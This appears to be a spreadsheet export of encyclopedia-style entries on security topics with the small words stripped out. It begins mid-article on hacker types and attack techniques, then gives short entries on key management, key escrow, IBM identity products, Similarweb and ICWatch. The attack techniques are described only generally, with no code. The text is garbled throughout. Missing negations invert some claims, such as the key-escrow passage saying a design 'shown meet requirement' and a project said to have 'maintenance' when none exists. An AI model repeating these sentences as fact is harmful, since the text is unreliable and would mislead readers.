ralph clifford, cracker cracking "gain unauthorized access computer order commit another crime destroying information contained system". these subgroups also defined legal status activities. white white hacker breaks security non-malicious reasons, either test security system, perform penetration tests vulnerability assessments client, working security company makes security software. term generally synonymous ethical hacker, ec-council, among others, developed certifications, courseware, classes, online training covering diverse arena ethical hacking. black black hacker hacker "violates computer security little reason beyond maliciousness personal gain" (moore, 2005). term coined richard stallman, contrast maliciousness criminal hacker versus spirit playfulness exploration hacker culture, ethos white hacker performs hacking duties identify places repair means legitimate employment. black hackers form stereotypical, illegal hacking groups often portrayed popular culture, "the epitome public fears computer criminal". grey grey hacker lies black white hacker. grey hacker surf internet hack computer system sole purpose notifying administrator system security defect, example. they offer correct defect fee. grey hackers sometimes find defect system publish facts world instead group people. even though grey hackers necessarily perform hacking personal gain, unauthorized access system considered illegal unethical. elite hacker social status among hackers, elite used describe skilled. newly discovered exploits circulate among hackers. elite groups masters deception conferred kind credibility members. script kiddie script kiddie (also known skid skiddie) unskilled hacker breaks computer systems using automated tools written others (usually black hackers), hence term script (i.e. computer script automates hacking) kiddie (i.e. kid, child individual lacking knowledge experience, immature), usually little understanding underlying concept. neophyte neophyte ("newbie", "noob") someone hacking phreaking almost knowledge experience workings technology hacking. blue blue hacker someone outside computer security consulting firms used bug-test system prior launch, looking exploits closed. microsoft also uses term bluehat represent series security briefing events. hacktivist hacktivist hacker utilizes technology publicize social, ideological, religious political message. hacktivism divided main groups: cyberterrorism activities involving website defacement denial-of-service attacks; and, freedom information making information public, public non-machine-readable formats, accessible public. nation state intelligence agencies cyberwarfare operatives nation states. organized criminal gangs groups hackers carry organized criminal activities profit. modern-day computer hackers compared privateers by-gone days. these criminals hold computer systems hostage, demanding large payments victims restore access computer systems data. furthermore, recent ransomware attacks industries, including energy, food, transportation, blamed criminal organizations based near state actor possibly country’s knowledge approval. cyber theft ransomware attacks fastest-growing crimes united states. bitcoin cryptocurrencies facilitate extortion huge ransoms large companies, hospitals city governments little chance caught. attacks hackers usually sorted types attacks: mass attacks targeted attacks. they sorted groups terms choose victims attacks.a typical approach attack internet-connected system network enumeration: discovering information intended target. vulnerability analysis: identifying potential ways attack. exploitation: attempting compromise system employing vulnerabilities found vulnerability analysis.in order several recurring tools trade techniques used computer criminals security experts. security exploits security exploit prepared application takes advantage known weakness. common examples security exploits injection, cross-site scripting cross-site request forgery abuse security holes result substandard programming practice. other exploits would able used file transfer protocol (ftp), hypertext transfer protocol (http), php, ssh, telnet pages. these common site domain hacking. techniques vulnerability scanner vulnerability scanner tool used quickly check computers network known weaknesses. hackers also commonly port scanners. these check ports specified computer "open" available access computer, sometimes detect program service listening port, version number. (firewalls defend computers intruders limiting access ports machines, still circumvented.)finding vulnerabilities hackers also attempt find vulnerabilities manually. common approach search possible vulnerabilities code computer system test them, sometimes reverse engineering software code provided. experienced hackers easily find patterns code find common vulnerabilities.brute-force attack password guessing. brute-force attacks fast used check short passwords, longer passwords methods dictionary attack used, time brute-force search takes.password cracking password cracking process recovering passwords data stored transmitted computer system. common approaches include repeatedly trying guesses password, trying common passwords hand, repeatedly trying passwords "dictionary", text file many passwords.packet analyzer packet analyzer ("packet sniffer") application captures data packets, used capture passwords data transit network.spoofing attack (phishing) spoofing attack involves program, system website successfully masquerades another falsifying data thereby treated trusted system user another program usually fool programs, systems users revealing confidential information, user names passwords.rootkit rootkit program uses low-level, hard-to-detect methods subvert control operating system legitimate operators. rootkits usually obscure installation attempt prevent removal subversion standard system security. they include replacements system binaries, making virtually impossible detected checking process tables.social engineering second stage targeting process, hackers often social engineering tactics enough information access network. they contact system administrator pose user cannot access system. this technique portrayed 1995 film hackers, protagonist dade "zero cool" murphy calls somewhat clueless employee charge security television network. posing accountant working company, dade tricks employee giving phone number modem gain access company's computer system.hackers technique must familiar target's security practices order trick system administrator giving information. cases, help-desk employee limited security experience answer phone relatively easy trick. another approach hacker pose angry supervisor, his/her authority questioned, threaten fire help-desk worker. social engineering effective, users vulnerable part organization. security devices programs keep organization safe employee reveals password unauthorized person.social engineering broken four sub-groups: intimidation "angry supervisor" technique above, hacker convinces person answers phone danger unless help them. point, many people accept hacker supervisor give information seek. helpfulness opposite intimidation, helpfulness exploits many people's natural instinct help others solve problems. rather acting angry, hacker acts distressed concerned. help desk vulnerable type social engineering, (a.) general purpose help people; (b.) usually authority change reset passwords, exactly hacker wants. name-dropping hacker uses names authorized users convince person answers phone hacker legitimate user herself. some names, webpage owners company officers, easily obtained online. hackers also known obtain names examining discarded documents ("dumpster diving"). technical using technology also information. hacker send email legitimate user, seeking response contains vital information. hacker claim involved enforcement needs certain data investigation, record-keeping purposes.trojan horses trojan horse program seems thing actually another. used back door computer system, enabling intruder gain access later. (the name refers horse trojan war, conceptually similar function deceiving defenders bringing intruder protected area.)computer virus virus self-replicating program spreads inserting copies executable code documents. this, behaves similarly biological virus, spreads inserting living cells. while viruses harmless mere hoaxes, considered malicious.computer worm like virus, worm also self-replicating program. differs virus (a.) propagates computer networks without user intervention; (b.) need attach existing program. nonetheless, many people terms "virus" "worm" interchangeably describe self-propagating program.keystroke logging keylogger tool designed record ("log") every keystroke affected machine later retrieval, usually allow user tool gain access confidential information typed affected machine. some keyloggers virus-, trojan-, rootkit-like methods conceal themselves. however, used legitimate purposes, even enhance computer security. example, business maintain keylogger computer used point sale detect evidence employee fraud.attack patterns attack patterns defined series repeatable steps applied simulate attack security system. they used testing purposes locating potential vulnerabilities. they also provide, either physically reference, common solution pattern preventing given attack.tools procedures thorough examination hacker tools procedures found cengage learning's e|csa certification workbook. notable intruders criminal hackers notable security hackers andrew auernheimer, sentenced years prison, grey hacker whose security group goatse security exposed flaw at&amp;t's ipad security. kaminsky expert exposed multiple flaws protocol investigated sony's rootkit security issues 2005. spoke front united states senate technology issues. cummings (also known bernie longstanding writer 2600: hacker quarterly. 1995, arrested charged possession technology could used fraudulent purposes, legal precedents denied bail hearing speedy trial. eric corley (also known emmanuel goldstein) longstanding publisher 2600: hacker quarterly. also founder hackers planet earth (hope) conferences. part hacker community since late 1970s. susan headley (also known susan thunder), american hacker active late 1970s early 1980s widely respected expertise social engineering, pretexting, psychological subversion. became heavily involved phreaking kevin mitnick lewis payne angeles, later framed erasing system files leasing falling out, leading mitnick's first conviction. gary mckinnon scottish hacker facing extradition united states face criminal charges. many people called authorities lenient mckinnon, asperger syndrome. extradition dropped. gordon lyon, known handle fyodor, authored nmap security scanner well many network security books sites. founding member honeynet project vice president computer professionals social responsibility. guccifer 2.0, claimed hacked democratic national committee (dnc) computer network jacob appelbaum advocate, security researcher, developer project. speaks internationally usage human rights groups others concerned internet anonymity censorship. joanna rutkowska polish computer security researcher developed blue pill rootkit qubes jude milhon (known jude) american hacker activist, founding member cypherpunk movement, creators community memory, first public computerized bulletin board system. kevin mitnick computer security consultant author, formerly wanted computer criminal united states history. sassaman belgian computer programmer technologist also privacy advocate. meredith patterson well-known technologist biohacker presented research kaminsky sassaman many international security hacker conferences. kimberley vanvaeck (known gigabyte) belgian hacker recognized writing first virus michał zalewski (lcamtuf) prominent security researcher. solar designer pseudonym founder openwall project. kane gamble, sentenced years youth detention, autistic, gained access highly sensitive information "cyber-terrorised" high-profile u.s. intelligence officials chief john brennan director national intelligence james clapper. customs computer underground produced specialized slang, 1337speak. writing software performing activities support views referred hacktivism. some consider illegal cracking ethically justified goals; common form website defacement. computer underground frequently compared wild west. common hackers aliases conceal identities. hacker groups conventions computer underground supported regular real-world gatherings called hacker conventions "hacker cons". these events include summercon (summer), con, hohocon (christmas), shmoocon (february), blackhat, chaos communication congress, athcon, hacker halted, hope. local hackfest groups organize compete develop skills send team prominent convention compete group pentesting, exploit forensics larger scale. hacker groups became popular early 1980s, providing access hacking information resources place learn members. computer bulletin board systems (bbss), utopias, provided platforms information-sharing dial-up modem. hackers could also gain credibility affiliated elite groups. consequences malicious hacking india netherlands article 138ab wetboek strafrecht prohibits computervredebreuk, defined intruding automated work part thereof intention law. intrusion defined access means defeating security measures technical means false signals false cryptographic stolen usernames passwords.maximum imprisonment year fine fourth category. united states u.s.c. 1030, commonly known computer fraud abuse act, prohibits unauthorized access damage "protected computers". "protected computers" defined u.s.c. 1030(e)(2) computer exclusively financial institution united states government, case computer exclusively use, used financial institution united states government conduct constituting offense affects financial institution government. computer used affecting interstate foreign commerce communication, including computer located outside united states used manner affects interstate foreign commerce communication united states;the maximum imprisonment fine violations computer fraud abuse depends severity violation offender's history violations act. demonstrated ability recover ransoms paid cryptocurrency victims cybertheft. hacking media hacker magazines notable hacker-oriented print publications phrack, hakin9 2600: hacker quarterly. while information contained hacker magazines ezines often outdated time published, enhanced contributors' reputations documenting successes. hackers fiction hackers often show interest fictional cyberpunk cyberculture literature movies. adoption fictional pseudonyms, symbols, values metaphors works common. books cyberpunk novels william gibson especially sprawl trilogy popular hackers. helba .hack manga anime series merlin amber, protagonist second series chronicles amber roger zelazny, young immortal hacker-mage prince ability traverse shadow dimensions. lisbeth salander girl dragon tattoo stieg larsson alice heaven's memo ender's game orson scott card evil genius catherine jinks hackers (anthology) jack dann gardner dozois little brother cory doctorow neuromancer william gibson snow crash neal stephenson films non-fiction books deception kevin mitnick intrusion kevin mitnick cuckoo's clifford stoll ghost wires: adventures world's most wanted hacker kevin mitnick hacker crackdown bruce sterling hacker's handbook hugo cornwall (peter sommer) hacking: exploitation second edition erickson inner circle bill landreth howard rheingold underground suelette dreyfus also references further reading samuel chng, ayush kumar, david (march 2022). "hacker types, motivations strategies: comprehensive framework". computers human behavior reports. issn 2451-9588. retrieved january 2022.{{cite journal}}: maint: multiple names: authors list (link) apro, bill; hammond, graeme (2005). hackers: hunt australia's most infamous computer cracker. rowville, vic: five mile press. isbn 1-74124-722-5. beaver, kevin (2010). hacking dummies. hoboken, wiley pub. isbn 978-0-7645-5784-2. conway, richard; cordingley, julian (2004). code hacking: developer's guide network security. hingham, mass: charles river media. isbn 978-1-58450-314-9. freeman, david mann, charles (1997). large: strange case world's biggest internet invasion. york: simon schuster. isbn 0-684-82464-7. granville, johanna (winter 2003). "dot.con: dangers cyber crime call proactive solutions". australian journal politics history. (1): 102–109. doi:10.1111/1467-8497.00284. retrieved february 2014. gregg, michael (2006). certified ethical hacker. indianapolis, ind: certification. isbn 978-0-7897-3531-7. hafner, katie; markoff, john (1991). cyberpunk: outlaws hackers computer frontier. york: simon schuster. isbn 0-671-68322-5. harper, allen; harris, shon; ness, jonathan (2011). gray hacking: ethical hacker's handbook (3rd ed.). york: mcgraw-hill. isbn 978-0-07-174255-9. mcclure, stuart; scambray, joel; kurtz, george (1999). hacking exposed: network security secrets solutions. berkeley, calif: mcgraw-hill. isbn 0-07-212127-0. russell, ryan (2004). stealing network: continent. rockland, mass: syngress media. isbn 978-1-931836-05-0. taylor, paul (1999). hackers: crime digital sublime. london: routledge. isbn 978-0-415-18072-6. external links tech pcworld staff (november 2001). timeline: 40-year history hacking 1960 2001 hackers heroes? video produced book (web series)</t>
  </si>
  <si>
    <t>Key management</t>
  </si>
  <si>
    <t>management refers management cryptographic keys cryptosystem. this includes dealing generation, exchange, storage, use, crypto-shredding (destruction) replacement keys. includes cryptographic protocol design, servers, user procedures, relevant protocols.key management concerns keys user level, either users systems. this contrast scheduling, typically refers internal handling keys within operation cipher. successful management critical security cryptosystem. challenging side cryptography sense involves aspects social engineering system policy, user training, organizational departmental interactions, coordination elements, contrast pure mathematical practices automated. types keys cryptographic systems different types keys, systems using one. these include symmetric keys asymmetric keys. symmetric algorithm keys involved identical encrypting decrypting message. keys must chosen carefully, distributed stored securely. asymmetric keys, also known public keys, contrast distinct keys mathematically linked. they typically used together communicate. public infrastructure (pki), implementation public cryptography, requires organization establish infrastructure create manage public private pairs along digital certificates. inventory starting point certificate private management strategy create comprehensive inventory certificates, locations responsible parties. this trivial matter certificates variety sources deployed variety locations different individuals teams simply possible rely list single certificate authority. certificates renewed replaced expire cause serious downtime outages. some considerations: regulations requirements, like pci-dss, demand stringent security management cryptographic keys auditors increasingly reviewing management controls processes use. private keys used certificates must kept secure unauthorised individuals intercept confidential communications gain unauthorised access critical systems. failure ensure proper segregation duties means admins generate encryption keys access sensitive, regulated data. certificate authority compromised encryption algorithm broken, organizations must prepared replace certificates keys matter hours. management steps once keys inventoried, management typically consists three steps: exchange, storage use. exchange prior secured communication, users must details cryptography. instances require exchanging identical keys case symmetric system). others require possessing party's public key. while public keys openly exchanged (their corresponding private kept secret), symmetric keys must exchanged secure communication channel. formerly, exchange extremely troublesome, greatly eased access secure channels diplomatic bag. clear text exchange symmetric keys would enable interceptor immediately learn key, encrypted data. advance public cryptography 1970s made exchange keys less troublesome. since diffie-hellman exchange protocol published 1975, become possible exchange insecure communications channel, substantially reduced risk disclosure distribution. possible, using something akin book code, include indicators clear text attached encrypted message. encryption technique used richard sorge's code clerk type, referring page statistical manual, though fact code. german army enigma symmetric encryption mixed type early use; combination secretly distributed schedules user chosen session component message. modern systems, openpgp compatible systems, session symmetric algorithm distributed encrypted asymmetric algorithm. this approach avoids even necessity using exchange protocol like diffie-hellman exchange. another method exchange involves encapsulating within another. typically master generated exchanged using secure method. this method usually cumbersome expensive (breaking master multiple parts sending trusted courier example) suitable larger scale. once master securely exchanged, used securely exchange subsequent keys ease. this technique usually termed wrap. common technique uses block ciphers cryptographic hash functions.a related method exchange master (sometimes termed root key) derive subsidiary keys needed data (often referred diversification data). common method probably smartcard-based cryptosystems, found banking cards. bank credit network embeds secret card's secure storage card production secured production facility. then point sale card card reader able derive common session keys based shared secret card-specific data (such card serial number). this method also used keys must related (i.e., departmental keys tied divisional keys, individual keys tied departmental keys). however, tying keys increases damage result security breach attackers learn something key. this reduces entropy, regard attacker, involved. storage however distributed, keys must stored securely maintain communications security. security concern hence various techniques likely common encryption application manages keys user depends access password control key. likewise, case smartphone keyless access platforms, keep identifying door information mobile phones servers encrypt data, like low-tech keys, users give codes trust.in terms regulation, address storage depth. "some contain minimal guidance like 'don’t store keys encrypted data' suggest 'keys kept securely.'" notable exceptions 3.2.1, nist 800-53 nist 800–57.for optimal security, keys stored hardware security module (hsm) protected using technologies trusted execution environment (tee, e.g. intel sgx) multi-party computation (mpc). additional alternatives include utilizing trusted platform modules (tpm), virtual hsms, "poor man's hardware security modules" (pmhsm), non-volatile field-programmable-gate-arrays (fpga) supporting system-on-chip configurations. order verify integrity stored without compromising actual value algorithm used. major issue length time used, therefore frequency replacement. because increases attacker's required effort, keys frequently changed. this also limits loss information, number stored encrypted messages become readable found decrease frequency change increases. historically, symmetric keys used long periods situations exchange difficult possible intermittently. ideally, symmetric change message interaction, message become readable learned (e.g., stolen, cryptanalyzed, social engineered). challenges several challenges organizations face trying control manage encryption keys are: scalability: managing large number encryption keys. security: vulnerability keys outside hackers, malicious insiders. availability: ensuring data accessibility authorized users. heterogeneity: supporting multiple databases, applications standards. governance: defining policy-driven access control protection data. governance includes compliance data protection requirements. compliance management compliance refers oversight, assurance, capability able demonstrate keys securely managed. this includes following individual compliance domains: physical security visible form compliance, include locked doors secure system equipment surveillance cameras. these safeguards prevent unauthorized access printed copies material computer systems management software. logical security protects organization theft unauthorized access information. this cryptographic keys comes encrypting data, rendered useless decrypt personnel security involves assigning specific roles privileges personnel access information strict need-to-know basis. background checks performed employees along periodic role changes ensure security.compliance achieved respect national international data protection standards regulations, payment card industry data security standard, health insurance portability accountability act, sarbanes–oxley act, general data protection regulation. management compliance systems management system management system (kms), also known cryptographic management system (ckms) enterprise management system (ekms), integrated approach generating, distributing managing cryptographic keys devices applications. they cover aspects security secure generation keys secure exchange keys secure handling storage client. thus, includes backend functionality generation, distribution, replacement well client functionality injecting keys, storing managing keys devices. standards-based management many specific applications developed management systems home grown protocols. however, systems become interconnected keys need shared different systems. facilitate this, management standards evolved define protocols used manage exchange cryptographic keys related information. management interoperability protocol (kmip) kmip extensible management protocol developed many organizations working within oasis standards body. first version released 2010, developed active technical committee. protocol allows creation keys distribution among disparate software systems need utilize them. covers full life cycle symmetric asymmetric keys variety formats, wrapping keys, provisioning schemes, cryptographic operations well meta data associated keys. protocol backed extensive series test cases, interoperability testing performed compliant systems year. list products conform kmip standard found oasis website. closed source non-kmip-compliant management open source barbican, openstack security api. keybox web-based access management. epks echo public share, system share encryption keys online community. kmc-subset137 management system implementing unisig subset-137 ertms/etcs railway application. privacyidea factor management support managing keys. strongkey open source, last updated sourceforge 2016. there maintenance project according home page. vault secret server hashicorp. nucypher secrethub end-to-end encrypted saas management closed source amazon service (aws) management service (kms) bell manager bloombase keycastle cryptomathic ckms encryptionizer manager (windows only) google cloud management cloud protect microsoft azure vault porticor virtual private data communications security universal manager akeyless vault security policy security policy management system provides rules used protect keys metadata management system supports. defined national institute standards technology nist, policy shall establish specify rules information protect its: confidentiality integrity availability authentication sourcethis protection covers complete life-cycle time becomes operational elimination. bring encryption bring encryption (byoe)—also called bring (byok)—refers cloud-computing security model allow public-cloud customers encryption software manage encryption keys. this security model usually considered marketing stunt, critical keys handed third parties (cloud providers) owners still left operational burden generating, rotating sharing keys. offers variant capability called keep your customers exclusive control keys. public-key infrastructure (pki) public-key infrastructure type management system uses hierarchical digital certificates provide authentication, public keys provide encryption. pkis used world wide traffic, commonly form tls. multicast group management group management means managing keys group communication. most group communications multicast communication message sent sender, received users. main problem multicast group communication security. order improve security, various keys given users. using keys, users encrypt messages send secretly. ietf.org released 4046, entitled multicast security (msec) group management architecture, discusses challenges group management. also references 45.neokeymanager hancom intelligence inc. external links recommendation management part general, nist special publication 800-57 nist cryptographic toolkitq* ieee security storage working group (siswg) creating p1619.3 standard management american national standards institute ansi x9.24, retail financial services symmetric management oasis management interoperability protocol (kmip) technical committee oasis enterprise management infrastructure (ekmi)technical committee "key management powerful keystore" "intelligent management system keyguard senergy intellution" security lifecycle manager, sklm neokeymanager hancom intelligence inc.</t>
  </si>
  <si>
    <t>IBM Tivoli Identity Manager</t>
  </si>
  <si>
    <t>tivoli identity manager, also known tim, itim, isim (ibm security identity manager), identity management system product ibm. provides centralized identity lifecycle management. automatically create, manage, delete user access various system resources files, servers, applications, based roles requests. other functions include self-provisioning, management offline accounts, password vaulting. product history acquired access360 2002 rebranded enrole product 4.4. later versions product built code base. 4.5.1 released september 2003. released july 2005. 5.0, released december 2007. released june 2009.ibm changed name product security identity manager (isim) release version (ibm security identity manager v6.0) 2012. targeted identity management market 2006 release tivoli identity manager express. references also security identity manager (formerly tivoli identity manager) product home</t>
  </si>
  <si>
    <t>Security management</t>
  </si>
  <si>
    <t>security management identification organization's assets (including people, buildings, machines, systems information assets), followed development, documentation, implementation policies procedures protecting assets. organization uses security management procedures information classification, threat assessment, risk assessment, risk analysis identify threats, categorize assets, rate system vulnerabilities. loss prevention loss prevention focuses one's critical assets going protect them. component loss prevention assessing potential threats successful achievement goal. this must include potential opportunities object (why take risk unless there's upside?) balance probability impact determine implement measures minimize eliminate threats. security risk management management security risks applies principles risk management management security threats. consists identifying threats risk causes), assessing effectiveness existing controls face threats, determining risks' consequence(s), prioritizing risks rating likelihood impact, classifying type risk, selecting appropriate risk option risk response. 2016, universal standard managing risks developed netherlands. 2017, updated named: universal security management systems standard 2017. types risks external strategic: competition customer demand. operational: regulations, suppliers, contract. financial: credit. hazard: natural disasters, cyber, external criminal acts. compliance: regulatory legal requirements introduced, existing ones changed, exposing organization non-compliance risk measures taken ensure compliance. internal strategic: r&amp;d. operational: systems processes (h&amp;r, payroll). financial: liquidity cash flow. hazard: safety security; employees equipment. compliance: concrete potential changes organization's systems, processes, suppliers, etc. create exposure legal regulatory non-compliance. risk options risk avoidance first choice considered possibility eliminating existence criminal opportunity avoiding creation opportunity. when additional considerations factors created result action would create greater risk. example, removing cash flow retail outlet would eliminate opportunity stealing money, would also eliminate ability conduct business. risk reduction when avoiding eliminating criminal opportunity conflicts ability conduct business, next step reducing opportunity potential loss lowest level consistent function business. example above, application risk reduction might result business keeping enough cash hand day's operation. risk spreading assets remain exposed application reduction avoidance subjects risk spreading. this concept limits loss potential losses exposing perpetrator probability detection apprehension prior consummation crime application perimeter lighting, barred windows, intrusion detection systems. idea reduce time available thieves steal assets escape without apprehension. risk transfer primary methods accomplishing risk transfer insure assets raise prices cover loss event criminal act. generally speaking, first three steps properly applied, cost transferring risks much lower. risk acceptance remaining risks must simply assumed business part business. included accepted losses deductibles, made part insurance coverage. security policy implementations intrusion detection alarm device. access control locks, simple sophisticated, biometric authentication keycard locks. physical security environmental elements (ex. mountains, trees, etc.). barricade. security guards (armed unarmed) wireless communication devices (e.g., two-way radio). security lighting (spotlight, etc.). security cameras. motion detectors. ibns containers cash transit. procedures coordination enforcement agencies. fraud management. risk management. cpted. risk analysis. risk mitigation. contingency planning. also references further reading news depth. news home. web. mar. 2011. &lt;http://news.bbc.co.uk/2/shared/spl/hi/guides/456900/456993/html/&gt;. rattner, daniel. "loss prevention risk management strategy." security management. northeastern university, boston. mar. 2010. lecture. rattner, daniel. "risk assessments." security management. northeastern university, boston. mar. 2010. lecture. rattner, daniel. "internal external threats." security management. northeastern university, boston. april. 2010. lecture. asset protection security management handbook, publishing llc, 2003, 31000 risk management principles guidelines, 2009, universal security management systems standard 2017 requirements guidance use, 2017, security management training tscm training this article incorporates public domain material general services administration document: "federal standard 1037c". support mil-std-188)</t>
  </si>
  <si>
    <t>IC3 (certification)</t>
  </si>
  <si>
    <t>certification (internet core competency certification) digital literacy certification global benchmark basic computer literacy, including operating systems, hardware, software, networks. certifications test concepts skills apply almost school career pathway. multiple standards levels, including: global standard (gs6) current certification. consists three exams: computing fundamentals, living online, applications. global standard (gs5) global standard (gs4) spark, younger children lack solid foundation digital concepts fasttrack, designed gauge skill incoming students candidates developer fundamentals, designed validate technology fundamentals required pursue career software developmentthe certification exams administered certiport available courses provided total seminars. official certiport page references</t>
  </si>
  <si>
    <t>Key escrow</t>
  </si>
  <si>
    <t>escrow (also known "fair" cryptosystem) arrangement keys needed decrypt encrypted data held escrow that, certain circumstances, authorized third party gain access keys. these third parties include businesses, want access employees' secure business-related communications, governments, wish able view contents encrypted communications (also known exceptional access).the technical problem largely structural one. access protected information must provided intended recipient least third party. third party permitted access carefully controlled conditions, instance, court order. thus far, system design shown meet requirement fully technical basis alone. proposed systems also require correct functioning social linkage, instance process request access, examination request 'legitimacy' court), granting access technical personnel charged access control. linkages controls serious problems system design security perspective. systems changed easily rendered especially vulnerable accidental release result many devices becoming totally compromised, necessitating immediate change replacement system. national level, escrow controversial many countries least reasons. involves mistrust security structural escrow arrangement. many countries long history less adequate protection others' information assorted organizations, public private, even information held affirmative legal obligation protect unauthorized access. another technical concerns additional vulnerabilities likely introduced supporting escrow operations. thus far, escrow system designed meets objections nearly failed meet even one. escrow proactive, anticipating need access keys; retroactive alternative disclosure law, users required surrender keys upon demand enforcement, else face legal penalties. disclosure avoids technical issues risks escrow systems, also introduces risks like loss keys legal issues involuntary self-incrimination. ambiguous term recovery applied types systems. also cryptography management clipper chip data securities international related-key attack backdoor references external links "the risks recovery, escrow, trusted third-party encryption". 1997–98. encryption policy: memo vice president memo gore suggested policy recovery, september 1996. archived original 2012-10-15</t>
  </si>
  <si>
    <t>Similarweb</t>
  </si>
  <si>
    <t>similarweb digital intelligence provider enterprise small mid-sized business (smb) customers. platform provides analytics services offers users information clients' competitors' traffic performance. company offices worldwide, headquarters aviv. company went public york stock exchange 2021. history company founded 2007 offer aviv, israel. 2009, similarweb first israeli seedcamp, attracting attention international media investors. company raised series round $1.1 million investment yossi vardi, docor international management. similarsites, browser extension help users find sites similar visiting, launched later year. september 2013, company closed series round david alliance, moshe lichtman participation existing investor docor international management. february 2014, south africa media giant naspers invested million similarweb leading series round. within month, similarweb used part capital acquisition israeli early-stage company tapdog million dollars shares cash, less year tapdog founded.in november 2014, similarweb raised million series investment.in july 2015, similarweb acquired personalized content discovery platform developer swayy.in july 2017, company announced million round financing viola group, saban ventures participation ventures existing investors.in 2021, similarweb made public debut nyse $1.6b valuation.in october 2021, similarweb "best alternative data provider" hedgeweek americas awards 2021, investors intelligence suite.on february 2022, similarweb reported earnings 2021, revenue $40.2m $165m. technology similarweb develops tools enable analysis traffic behavior users websites apps. service datasets provided limited free edition, paid platform addressed smbs large companies require access accurate comprehensive data larger scales marketing, sales market research. data collected number different sources provide information internet usage users, including various information partners, anonymous data users various dedicated browser addons company distributes. ranking similarweb ranks websites apps based traffic engagement metrics. ranking calculated according collected datasets updated monthly basis data. ranking system covers categories websites apps countries designed estimate website's popularity growth potential. company ranks websites based traffic engagement data, ranks apps store (ios/ipados) google play store based installs active user data. acquisitions december 2015, similarweb announced acquired quettra, silicon valley-based mobile intelligence startup, boost mobile operations.in november 2021, similarweb acquired "embee" extend mobile user data sets. 2022, similarweb acquired "rankranger" extend offering industry. rank ranger provides keyword rank tracking services advanced api's added similarweb's existing tools create comprehensive suite. also google analytics analytics service google list visited websites jamiitalk coming popular website tanzania list search engines list directories list visited website tanzania references external links official website</t>
  </si>
  <si>
    <t>ICWatch</t>
  </si>
  <si>
    <t>icwatch public database mainly linkedin profiles people united states intelligence community. database created transparency toolkit hosted wikileaks. background publication global surveillance disclosures 2013 revealed code names surveillance projects including marina mainway. discovered linkedin profiles individuals intelligence community mentioned code names well additional ones. transparency toolkit took advantage automated collection linkedin profiles mentioning code names, collating searchable database. name name "icwatch" play icreach, alleged top-secret, surveillance-related search engine created united states national security agency (nsa) september attacks. history initial commit repository lookingglass made august 2014. lookingglass search tool built icwatch.icwatch launched 2015; day, transparency toolkit, group created icwatch, presented re:publica conference. launch, database contained information 27,000 linkedin profiles.by mid-may 2015, transparency toolkit began receiving requests individuals removed icwatch, including death threats. following threats well distributed denial-of-service attacks made site, wikileaks began hosting website database 2015.in august 2016 techcrunch reported linkedin suing unnamed individuals scraped linkedin's website, named icwatch possible target.as february 2017, database tracks 100,000 profiles linkedin, indeed, public sources. features database searched using company, location, industry, parameters intelligence workers. findings most discovered profiles national security agency working contractors.the project also revealed possible trends employment intelligence community. instance, "number people claiming work sigint databases increased dramatically years since 2008, small decline starting 2013."m. mcgrath transparency toolkit believes workers "for part, pretty normal people". reception paul world voiced concern safety individuals listed database. also open-source intelligence prism (surveillance program) external links official website references</t>
  </si>
  <si>
    <t>Key distribution in wireless sensor networks</t>
  </si>
  <si>
    <t>distribution important issue wireless sensor network (wsn) design [1]. wsns networks small, battery-powered, memory-constraint devices named sensor nodes, capability wireless communication restricted area. memory power constraints, need well arranged build fully functional network. distribution schemes predistribution method distribution keys onto nodes deployment. therefore, nodes build network using secret keys deployment, reach target position. predistribution schemes various methods developed academicians better maintenance management wsns. basically predistribution scheme phases: distribution shared discovery path-key establishmentduring phases, secret keys generated, placed sensor nodes, sensor node searches area communication range find another node communicate. secure link established nodes discover common keys (this differs scheme), communication done link nodes. afterwards, paths established connecting links, create connected graph. result wireless communication network functioning way, according predistribution scheme used creation. there number aspects wsns predistribution schemes competing achieve better result. critical ones are: local global connectivity, resiliency. local connectivity means probability sensor nodes common establish secure link communicate. global connectivity fraction nodes largest connected graph number nodes. resiliency number links cannot compromised number nodes(therefore keys them) compromised. basically quality resistance attempts hack network. apart these, critical issues design computational cost hardware cost. computational cost amount computation done phases. hardware cost generally cost memory battery node. keys generated randomly nodes determine mutual connectivity. structured approach based matrices establishes keys pair-wise fashion rolf blom. many variations blom's scheme exist. thus scheme combines blom's pre-distribution scheme random pre-distribution method providing better resiliency. also wireless sensor networks distribution blom's scheme references external links list publications management</t>
  </si>
  <si>
    <t>IBM Tivoli Directory Server</t>
  </si>
  <si>
    <t>security directory server, formerly known directory server tivoli directory server, implementation lightweight directory access protocol security directory server enterprise directory corporate intranets internet. security directory server built serve identity data foundation rapid development deployment applications security identity management initiatives including strong management, replication security features. several authentication methods available security directory server, beyond basic usernames passwords. security directory server supports digital certificate-based authentication, simple authentication security layer (sasl), challenge-response authentication mechanism (cram-md5), kerberos authentication. security directory server ldap infrastructure provides foundation deploying comprehensive identity management applications advanced software architectures. history during product's inception, named product secureway directory. this name changed release product known directory server. with next version product, release 5.2, name changed include tivoli known tivoli directory server. latest release offered 2014 security directory server. features supports millions entries leveraging advanced reliability scalability technology built-in proxy server extends demand identity infrastructure leading business solutions compliance ldap maintains high availability using robust master/subordinate peer-to-peer replication capabilities, dozens master servers integrates middleware, identity management security products, plus leverage open integration non-ibm offerings offers users web-based access ability update, “white pages” information flexibly supports leading platforms, including aix, solaris, microsoft windows server, hp-ux, suse linux distributions remote administration server extensive web-based interface also list ldap software references external links security directory server homepage security directory server information center software downloads</t>
  </si>
  <si>
    <t>ID-WSF</t>
  </si>
  <si>
    <t>computer networking, identity services framework protocol stack profiles ws-security, ws-addressing, saml adds protocol specifications own, discovery service, open market user service discovery, people service delegation social networking. development id-wsf stack developed liberty alliance. first release, id-wsf (and subsequent 1.2) released 2003. id-wsf1 interoperability tested among several vendor implementations, received certification liberty alliance. however, first version id-wsf widely adopted. perhaps significant adoption france telecom french government's service public. some adoption happened japan well. liberty alliance proceeded create improved version, id-wsf 2006, included harmonization certain ws-* technologies, ws-addressing ws-security. these changes vigorously, successfully, lobbied conor cahill time). id-wsf interoperability certification participated several major league vendors, well startups open source projects.since then, id-wsf become widely accepted interoperable profile ws-* technologies. strength essentially narrow focus tight enough profile interoperability specified. id-wsf interoperability certification liberty alliance accomplished several vendors, including open source. id-wsf adopted standards base finnish e-government project european commission project tas3. list implementations id-wsf microsystems trustgenix symlabs sfis zxid.org reference implementation tas3 trusted architecture securely shareable services, privacy lasso, library, bindings python, java, perl php, licence, developed entr'ouvert references</t>
  </si>
  <si>
    <t>Security event manager</t>
  </si>
  <si>
